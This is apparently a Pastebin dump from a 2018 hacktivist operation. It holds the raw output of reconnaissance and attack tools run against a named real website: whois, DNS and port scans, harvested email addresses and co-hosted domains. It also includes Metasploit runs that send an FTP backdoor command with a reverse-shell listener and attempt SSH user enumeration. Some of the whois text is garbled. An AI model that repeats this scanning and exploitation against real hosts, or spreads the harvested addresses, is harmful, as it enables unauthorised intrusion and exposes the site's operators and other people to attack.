API tools faq
paste
Advertisement
Guest User

Anonymous JTSEC #OpDomesticTerrorism Full Recon #10

a guest
Aug 17th, 2018
291
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.19 KB | None | 0 0
raw download clone embed print report
  1. ######################################################################################################################################
  2. Hostname mississippiwhiteknights.com ISP Affinity Internet, Inc
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region Unknown Local time 16 Aug 2018 22:08 CDT
  7. City Unknown Postal Code Unknown
  8. IP Address 207.150.212.85 Latitude 37.751
  9. Longitude -97.822
  10. #######################################################################################################################################
  11. HostIP:207.150.212.85
  12. HostName:mississippiwhiteknights.com
  13.  
  14. Gathered Inet-whois information for 207.150.212.85
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 207.89.128.0 - 207.174.215.255
  19. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr: IPv4 address block not managed by the RIPE NCC
  21. remarks: ------------------------------------------------------
  22. remarks:
  23. remarks: You can find the whois server to query, or the
  24. remarks: IANA registry to query on this web page:
  25. remarks: http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks: You can access databases of other RIRs at:
  28. remarks:
  29. remarks: AFRINIC (Africa)
  30. remarks: http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks: APNIC (Asia Pacific)
  33. remarks: http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks: ARIN (Northern America)
  36. remarks: http://www.arin.net/ whois.arin.net
  37. remarks:
  38. remarks: LACNIC (Latin America and the Carribean)
  39. remarks: http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks: IANA IPV4 Recovered Address Space
  42. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks: ------------------------------------------------------
  45. country: EU # Country is really world wide
  46. admin-c: IANA1-RIPE
  47. tech-c: IANA1-RIPE
  48. status: ALLOCATED UNSPECIFIED
  49. mnt-by: RIPE-NCC-HM-MNT
  50. mnt-lower: RIPE-NCC-HM-MNT
  51. mnt-routes: RIPE-NCC-RPSL-MNT
  52. created: 2018-07-09T15:19:08Z
  53. last-modified: 2018-07-09T15:19:08Z
  54. source: RIPE
  55.  
  56. role: Internet Assigned Numbers Authority
  57. address: see http://www.iana.org.
  58. admin-c: IANA1-RIPE
  59. tech-c: IANA1-RIPE
  60. nic-hdl: IANA1-RIPE
  61. remarks: For more information on IANA services
  62. remarks: go to IANA web site at http://www.iana.org.
  63. mnt-by: RIPE-NCC-MNT
  64. created: 1970-01-01T00:00:00Z
  65. last-modified: 2001-09-22T09:31:27Z
  66. source: RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.2 (ANGUS)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for mississippiwhiteknights.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: MISSISSIPPIWHITEKNIGHTS.COM
  75. Registry Domain ID: 192099484_DOMAIN_COM-VRSN
  76. Registrar WHOIS Server: whois.domainpeople.com
  77. Registrar URL: http://www.domainpeople.com
  78. Updated Date: 2016-08-12T20:53:12Z
  79. Creation Date: 2005-08-02T00:16:09Z
  80. Registry Expiry Date: 2021-08-02T00:16:09Z
  81. Registrar: DomainPeople, Inc.
  82. Registrar IANA ID: 65
  83. Registrar Abuse Contact Email:
  84. Registrar Abuse Contact Phone:
  85. Domain Status: clientTransferProhibited https�U@icann����.o�rg/eppɈt=�#cU@lientψt=�Tr�@ansfe�������rProhib�U@ited
  86. Name Server: ADNS.CS.SITEPROTECT.COM
  87. Name Server: BDNS.CS.SITEPROTECT.COM
  88. DNSSEC: unsigned
  89. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-08-17T03:12:18Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. XV@istrar's sponsorship of the domain name regisYV@he re����gi;stry i��t=�s
  96. currently set to expire. This date does not necessarily reflect the expiration
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar. Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access o�U@r que����ry our Wo�t=�hoU@is
  102. database through the use of electronic processes that are high-volume and
  103. automated except as reasonably necessary to register domain names or
  104. modify existing registrations; the Data in VeriSign Global Registry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois qu�U@ery, ����yo�u agre��t=�e U@to ab�t=�id�U@e
  109. by the following terms of use: You agree that you may use this Data only
  110. for lawful purposes and that under no circumstances will you use this Data
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this �U@Data ����is� expre��t=�ssU@ly
  116. prohibited without the prior written consent of VeriSign. You agree not to
  117. use electronic processes that are automated and high-volume to access or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. ����ational stability. VeriSign may restrict or�U@ the
  122. Whois database for failure to abide by these terms of use. VeriSign
  123. reserves the right to modify these terms at any time.
  124.  
  125. The Registry database contains ONLY .COM, .NET, .EDU domains and
  126. Registrars.
  127.  
  128. Gathered Netcraft information for mississippiwhiteknights.com
  129. ---------------------------------------------------------------------------------------------------------------------------------------
  130.  
  131. Retrieving Netcraft.com information for mississippiwhiteknights.com
  132. Netcraft.com Information gathered
  133.  
  134. Gathered Subdomain information for mississippiwhiteknights.com
  135. ---------------------------------------------------------------------------------------------------------------------------------------
  136. Searching Google.com:80...
  137. Searching Altavista.com:80...
  138. Found 0 possible subdomain(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
  139.  
  140. Gathered E-Mail information for mississippiwhiteknights.com
  141. ---------------------------------------------------------------------------------------------------------------------------------------
  142. Searching Google.com:80...
  143. Searching Altavista.com:80...
  144. Found 0 E-Mail(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
  145.  
  146. Gathered TCP Port information for 207.150.212.85
  147. ---------------------------------------------------------------------------------------------------------------------------------------
  148.  
  149. Port State
  150.  
  151. 21/tcp open
  152. 22/tcp open
  153. 80/tcp open
  154.  
  155. Portscan Finished: Scanned 150 ports, 140 ports were in state closed
  156.  
  157. #######################################################################################################################################
  158. [i] Scanning Site: http://mississippiwhiteknights.com
  159.  
  160.  
  161.  
  162. B A S I C I N F O
  163. =======================================================================================================================================
  164.  
  165.  
  166. [+] Site Title:
  167. [+] IP address: 207.150.212.85
  168. [+] Web Server: Apache
  169. [+] CMS: Could Not Detect
  170. [+] Cloudflare: Not Detected
  171. [+] Robots File: Found
  172.  
  173. -------------[ contents ]----------------
  174. User-agent: *
  175. Allow: *
  176.  
  177.  
  178. H T T P H E A D E R S
  179. =======================================================================================================================================
  180.  
  181.  
  182. [i] HTTP/1.1 200 OK
  183. [i] Date: Fri, 17 Aug 2018 03:24:20 GMT
  184. [i] Server: Apache
  185. [i] Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
  186. [i] ETag: "40c-440a6df015d40"
  187. [i] Accept-Ranges: bytes
  188. [i] Content-Length: 1036
  189. [i] Connection: close
  190. [i] Content-Type: text/html
  191.  
  192.  
  193. #######################################################################################################################################
  194.  
  195. [?] Enter the target: http://mississippiwhiteknights.com/firstpage.htm
  196. [!] IP Address : 207.150.212.85
  197. [!] Server: Apache
  198. [+] Clickjacking protection is not in place.
  199. [+] Operating System : Debian
  200. [!] mississippiwhiteknights.com doesn't seem to use a CMS
  201. [+] Honeypot Probabilty: 0%
  202. ---------------------------------------------------------------------------------------------------------------------------------------
  203. [~] Trying to gather whois information for mississippiwhiteknights.com
  204. [+] Whois information found
  205. [-] Unable to build response, visit https://who.is/whois/mississippiwhiteknights.com
  206. ---------------------------------------------------------------------------------------------------------------------------------------
  207. API count exceeded - Increased quota available with membership
  208. ---------------------------------------------------------------------------------------------------------------------------------------
  209.  
  210. [+] DNS Records
  211. bdns.cs.siteprotect.com. (64.41.114.12) AS7215 Affinity Internet, Inc United States
  212. adns.cs.siteprotect.com. (64.41.112.12) AS7215 Affinity Internet, Inc United States
  213.  
  214. [+] MX Records
  215. 10 (64.26.60.153) AS20401 Hostway Corporation United States
  216.  
  217. [+] Host Records (A)
  218. mississippiwhiteknights.comHTTP: (207.150.212.85) AS20401 Hostway Corporation United States
  219. mail.mississippiwhiteknights.com (mx0.mfg.onr.siteprotect.com) (64.26.60.153) AS20401 Hostway Corporation United States
  220.  
  221. [+] TXT Records
  222.  
  223. [+] DNS Map: https://dnsdumpster.com/static/map/mississippiwhiteknights.com.png
  224.  
  225. [>] Initiating 3 intel modules
  226. [>] Loading Alpha module (1/3)
  227. [>] Beta module deployed (2/3)
  228. [>] Gamma module initiated (3/3)
  229.  
  230.  
  231. [+] Emails found:
  232. ---------------------------------------------------------------------------------------------------------------------------------------
  233. emperor@mississippiwhiteknights.com
  234. ewk@mississippiwhiteknights.com
  235. imperialkludd@mississippiwhiteknights.com
  236. iw@mississippiwhiteknights.com
  237. pixel-1534475583153454-web-@mississippiwhiteknights.com
  238.  
  239. [+] Hosts found in search engines:
  240. ---------------------------------------------------------------------------------------------------------------------------------------
  241. [-] Resolving hostnames IPs...
  242. 207.150.212.85:Www.mississippiwhiteknights.com
  243. 64.26.60.153:mail.mississippiwhiteknights.com
  244. 207.150.212.85:www.mississippiwhiteknights.com
  245. [+] Virtual hosts:
  246. ---------------------------------------------------------------------------------------------------------------------------------------
  247. 207.150.212.85 www.chicagoland
  248. 207.150.212.85 www.gilpinezo.com
  249. 207.150.212.85 tarponshores
  250. 207.150.212.85 rafs.net
  251. 207.150.212.85 www.cthomasgroup
  252. 207.150.212.85 shypula
  253. 207.150.212.85 www.impulsopedagogico.com
  254. 207.150.212.85 sensiblepsychiatry
  255. [~] Crawling the target for fuzzable URLs
  256. [-] No fuzzable URLs found
  257. #######################################################################################################################################
  258. [*] Processing domain mississippiwhiteknights.com
  259. [+] Getting nameservers
  260. 64.41.114.12 - bdns.cs.siteprotect.com
  261. 64.41.112.12 - adns.cs.siteprotect.com
  262. [-] Zone transfer failed
  263.  
  264. [+] MX records found, added to target list
  265. 10 mail.mississippiwhiteknights.com.
  266.  
  267. [*] Scanning mississippiwhiteknights.com for A records
  268. 207.150.212.85 - mississippiwhiteknights.com
  269. 207.150.212.85 - ftp.mississippiwhiteknights.com
  270. 64.26.60.153 - mail.mississippiwhiteknights.com
  271. 64.26.60.229 - pop.mississippiwhiteknights.com
  272. 64.26.60.229 - smtp.mississippiwhiteknights.com
  273. 207.150.212.85 - www.mississippiwhiteknights.com
  274.  
  275. #######################################################################################################################################
  276. dnsenum VERSION:1.2.4
  277.  
  278. ----- mississippiwhiteknights.com -----
  279.  
  280.  
  281. Host's addresses:
  282. __________________
  283.  
  284. mississippiwhiteknights.com. 3443 IN A 207.150.212.85
  285.  
  286.  
  287. Name Servers:
  288. ______________
  289.  
  290. bdns.cs.siteprotect.com. 1002 IN A 64.41.114.12
  291. adns.cs.siteprotect.com. 1002 IN A 64.41.112.12
  292.  
  293.  
  294. Mail (MX) Servers:
  295. ___________________
  296.  
  297. mail.mississippiwhiteknights.com. 3600 IN A 64.26.60.153
  298.  
  299.  
  300. Trying Zone Transfers and getting Bind Versions:
  301. _________________________________________________
  302.  
  303.  
  304. Trying Zone Transfer for mississippiwhiteknights.com on bdns.cs.siteprotect.com ...
  305.  
  306. Trying Zone Transfer for mississippiwhiteknights.com on adns.cs.siteprotect.com ...
  307.  
  308. brute force file not specified, bay.
  309. #######################################################################################################################################
  310. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  311. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  312. Host is up (0.54s latency).
  313. Not shown: 466 closed ports, 6 filtered ports
  314. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  315. PORT STATE SERVICE
  316. 21/tcp open ftp
  317. 22/tcp open ssh
  318. 80/tcp open http
  319. 443/tcp open https
  320.  
  321. Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds
  322. #######################################################################################################################################
  323. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  324. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  325. Host is up (0.76s latency).
  326.  
  327. PORT STATE SERVICE
  328. 53/udp open|filtered domain
  329. 67/udp open|filtered dhcps
  330. 68/udp open|filtered dhcpc
  331. 69/udp open|filtered tftp
  332. 88/udp open|filtered kerberos-sec
  333. 123/udp open|filtered ntp
  334. 137/udp open|filtered netbios-ns
  335. 138/udp open|filtered netbios-dgm
  336. 139/udp open|filtered netbios-ssn
  337. 161/udp open snmp
  338. 162/udp open|filtered snmptrap
  339. 389/udp open|filtered ldap
  340. 520/udp open|filtered route
  341. 2049/udp open|filtered nfs
  342.  
  343. Nmap done: 1 IP address (1 host up) scanned in 4.48 seconds
  344. #######################################################################################################################################
  345. + -- --=[Port 21 opened... running tests...
  346. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
  347. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  348. Host is up (0.11s latency).
  349.  
  350. PORT STATE SERVICE VERSION
  351. 21/tcp filtered ftp
  352. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  353. Device type: firewall|general purpose
  354. Running: Linux 2.4.X|2.6.X, ISS embedded
  355. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  356. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  357.  
  358. TRACEROUTE (using proto 1/icmp)
  359. HOP RTT ADDRESS
  360. 1 ... 30
  361.  
  362. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  363. Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
  364.  
  365.  
  366. _---------.
  367. .' ####### ;."
  368. .---,. ;@ @@`; .---,..
  369. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
  370. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
  371. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
  372. "--'.@@@ -.@ @ ,'- .'--"
  373. ".@' ; @ @ `. ;'
  374. |@@@@ @@@ @ .
  375. ' @@@ @@ @@ ,
  376. `.@@@@ @@ .
  377. ',@@ @ ; _____________
  378. ( 3 C ) /|___ / Metasploit! \
  379. ;@'. __*__,." \|--- \_____________/
  380. '(.,...."/
  381.  
  382.  
  383. =[ metasploit v4.17.3-dev ]
  384. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  385. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  386. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  387.  
  388. RHOST => mississippiwhiteknights.com
  389. RHOSTS => mississippiwhiteknights.com
  390. [+] 207.150.212.85:21 - FTP Banner: '220 Welcome.\x0d\x0a'
  391. [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
  392. [*] Auxiliary module execution completed
  393. [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
  394. [*] Auxiliary module execution completed
  395. [*] mississippiwhiteknights.com:21 - Banner: 220 Welcome.
  396. [*] mississippiwhiteknights.com:21 - USER: 331 Please specify the password.
  397. [*] Exploit completed, but no session was created.
  398. [*] Started reverse TCP double handler on 10.211.1.5:4444
  399. [*] mississippiwhiteknights.com:21 - Sending Backdoor Command
  400. [*] Exploit completed, but no session was created.
  401. + -- --=[Port 22 opened... running tests...
  402. # general
  403. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7
  404. (gen) software: OpenSSH 6.0p1
  405. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
  406. (gen) compression: enabled (zlib@openssh.com)
  407.  
  408. # key exchange algorithms
  409. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  410. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  411. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  412. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  413. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  414. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  415. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  416. `- [info] available since OpenSSH 4.4
  417. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  418. `- [warn] using weak hashing algorithm
  419. `- [info] available since OpenSSH 2.3.0
  420. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  421. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  422. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  423. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  424. `- [warn] using small 1024-bit modulus
  425. `- [warn] using weak hashing algorithm
  426. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  427.  
  428. # host-key algorithms
  429. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  430. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  431. `- [warn] using small 1024-bit modulus
  432. `- [warn] using weak random number generator could reveal the key
  433. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  434. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  435. `- [warn] using weak random number generator could reveal the key
  436. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  437.  
  438. # encryption algorithms (ciphers)
  439. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  440. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  441. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  442. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  443. `- [warn] using weak cipher mode
  444. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  445. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  446. `- [warn] using weak cipher
  447. `- [warn] using weak cipher mode
  448. `- [warn] using small 64-bit block size
  449. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  450. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  451. `- [fail] disabled since Dropbear SSH 0.53
  452. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  453. `- [warn] using weak cipher mode
  454. `- [warn] using small 64-bit block size
  455. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  456. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  457. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  458. `- [warn] using weak cipher mode
  459. `- [warn] using small 64-bit block size
  460. `- [info] available since OpenSSH 2.1.0
  461. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  462. `- [warn] using weak cipher mode
  463. `- [info] available since OpenSSH 2.3.0
  464. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  465. `- [warn] using weak cipher mode
  466. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  467.  
  468. # message authentication code algorithms
  469. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  470. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  471. `- [warn] using encrypt-and-MAC mode
  472. `- [warn] using weak hashing algorithm
  473. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  474. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  475. `- [warn] using weak hashing algorithm
  476. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  477. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  478. `- [warn] using small 64-bit tag size
  479. `- [info] available since OpenSSH 4.7
  480. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  481. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  482. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  483. `- [warn] using encrypt-and-MAC mode
  484. `- [info] available since OpenSSH 5.9
  485. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  486. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  487. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  488. `- [warn] using encrypt-and-MAC mode
  489. `- [info] available since OpenSSH 5.9
  490. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  491. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  492. `- [warn] using encrypt-and-MAC mode
  493. `- [info] available since OpenSSH 2.5.0
  494. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  495. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  496. `- [warn] using encrypt-and-MAC mode
  497. `- [info] available since OpenSSH 2.1.0
  498. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  499. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  500. `- [warn] using encrypt-and-MAC mode
  501. `- [warn] using weak hashing algorithm
  502. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  503. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  504. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  505. `- [warn] using encrypt-and-MAC mode
  506. `- [warn] using weak hashing algorithm
  507. `- [info] available since OpenSSH 2.5.0
  508.  
  509. # algorithm recommendations (for OpenSSH 6.0)
  510. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  511. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  512. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  513. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  514. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  515. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  516. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  517. (rec) -ssh-dss -- key algorithm to remove
  518. (rec) -blowfish-cbc -- enc algorithm to remove
  519. (rec) -3des-cbc -- enc algorithm to remove
  520. (rec) -aes256-cbc -- enc algorithm to remove
  521. (rec) -cast128-cbc -- enc algorithm to remove
  522. (rec) -aes192-cbc -- enc algorithm to remove
  523. (rec) -aes128-cbc -- enc algorithm to remove
  524. (rec) -hmac-md5-96 -- mac algorithm to remove
  525. (rec) -hmac-sha2-256-96 -- mac algorithm to remove
  526. (rec) -hmac-ripemd160 -- mac algorithm to remove
  527. (rec) -hmac-sha1-96 -- mac algorithm to remove
  528. (rec) -umac-64@openssh.com -- mac algorithm to remove
  529. (rec) -hmac-md5 -- mac algorithm to remove
  530. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  531. (rec) -hmac-sha1 -- mac algorithm to remove
  532. (rec) -hmac-sha2-512-96 -- mac algorithm to remove
  533.  
  534. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:28 EDT
  535. Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
  536. Host is up (0.013s latency).
  537.  
  538. PORT STATE SERVICE VERSION
  539. 22/tcp filtered ssh
  540. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  541. Device type: firewall|general purpose
  542. Running: Linux 2.4.X|2.6.X, ISS embedded
  543. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  544. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  545.  
  546. TRACEROUTE (using proto 1/icmp)
  547. HOP RTT ADDRESS
  548. 1 ... 30
  549.  
  550. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  551. Nmap done: 1 IP address (1 host up) scanned in 11.59 seconds
  552.  
  553. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  554. %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  555. %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  556. %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
  557. %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  558. %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  559. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  560. %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  561. %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
  562. %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
  563. %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
  564. %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
  565. %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
  566. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
  567. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
  568. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  569.  
  570.  
  571. =[ metasploit v4.17.3-dev ]
  572. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  573. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  574. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  575.  
  576. USER_FILE => /brutex/wordlists/simple-users.txt
  577. RHOSTS => mississippiwhiteknights.com
  578. RHOST => mississippiwhiteknights.com
  579. [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
  580. [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
  581. [*] Auxiliary module execution completed
  582. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  583. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  584. [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
  585. [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
  586. [*] Auxiliary module execution completed
  587. #######################################################################################################################################
  588.  
  589. ^ ^
  590. _ __ _ ____ _ __ _ _ ____
  591. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  592. | V V // o // _/ | V V // 0 // 0 // _/
  593. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  594. <
  595. ...'
  596.  
  597. WAFW00F - Web Application Firewall Detection Tool
  598.  
  599. By Sandro Gauci && Wendel G. Henrique
  600.  
  601. Checking http://mississippiwhiteknights.com
  602. Generic Detection results:
  603. No WAF detected by the generic detection
  604. Number of requests: 14
  605. #######################################################################################################################################
  606.  
  607. wig - WebApp Information Gatherer
  608.  
  609.  
  610. Scanning http://mississippiwhiteknights.com...
  611. __________________ SITE INFO __________________
  612. IP Title
  613. 207.150.212.85
  614.  
  615. ___________________ VERSION ___________________
  616. Name Versions Type
  617. Apache Platform
  618.  
  619. _________________ INTERESTING _________________
  620. URL Note Type
  621. /test.htm Test file Interesting
  622. /test.html Test file Interesting
  623.  
  624. _______________________________________________
  625. Time: 112.2 sec Urls: 599 Fingerprints: 40401
